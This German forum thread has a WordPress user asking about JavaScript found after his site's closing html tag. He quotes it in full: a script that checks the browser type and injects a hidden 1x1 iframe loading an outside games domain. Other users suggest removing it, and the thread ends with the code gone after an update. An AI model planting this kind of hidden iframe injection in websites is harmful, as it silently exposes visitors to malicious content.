Unerwünschter Code in Wordpress

• Aloha, liebes Forum.

Ich bin derletzt auf eine ungereimtheit gestoßen, die mir absolut nicht gefallen wollte.
    Ich bin gerade dabei, Wordpress für einen Webauftritt zu nutzen ( http://www.hanstepe.de/HT-BLOG/ ). Dabei fiel mir immer wieder auf, dass sich der Browser, während er die Informationen für die Seite lud, mit einer url verband, die "pc-onlinegames (dot) net" lautete. Nun hat mein Webprojekt allerdings absolut nichts mit dieser Seite "pc-onlinegames net" zu tun. Aber warum will der Browser dann etwas von dieser url?
    Ich habe natürlich im Quelltext und im Editor von Wordpress in den PHP-Dateien mal nachgeforscht. In den PHP-Dateien stieß ich auch nichts hilfreiches, im Quelltext allerdings schon. Dort steht, hinter dem schliessenden html-tag noch ein zusätzlicher javascript-code:

Zitat

<script>var url="http://pc-onlinegames.net%22;if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script><script>var url="http://pc-onlinegames.net%22;if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script>

Woher kommt das? Wie bekomme ich das wieder weg? ..Und was für einen Zweck hat der Scriptcode nun? ...So ein fleissiger coder bin ich dann nämlich auch wieder nicht, dass mir das nun klar ist :-X

Ich danke für jedes helfende Wort!

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• Ich würde eher sagen: Neu(er) aufgesetzt. Es gibt ihn faktisch seit November 2011, wurde aber erst Januar 2012 aktiv genutzt bzw mit Information gefüllt und angepasst.

• Vorschlag (ohne mir das online angeschaut zu haben):
    - leg eine Sicherung der betreffenden Datei an.
    - Öffne die original Datei mit einem 'anständigen' Editor.
    - Entferne das gesammte Skript.
    - Datei speichern und auf den Server stellen.
    - aufruffen mit Deinem Browser.
    Was passiert nun?

Gruss und schöner Tag.

Das grösste Problem des Computers sitzt in der Regel ca. 40cm davor. ;-) - -

• Sorry, aber ich kann nirgends diesen Code in deinem Quellcode entdecken.

Huch. Richtig, mein Fehler. Hatte heute Vormittag erst das neue Wordpress installiert. Das Update hat den unerwünschten Codefetzen anscheinend eliminiert.
    Das tut mir leid, hätte sofort nach dem Codefetzen schauen müssen, ob er immer noch da ist oder nicht. Aber anscheinend ist er wirklich weg und das Thema ist erledigt.
    Trotzdem vielen Dank für alle, die sich damit beschäftigt haben! :)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!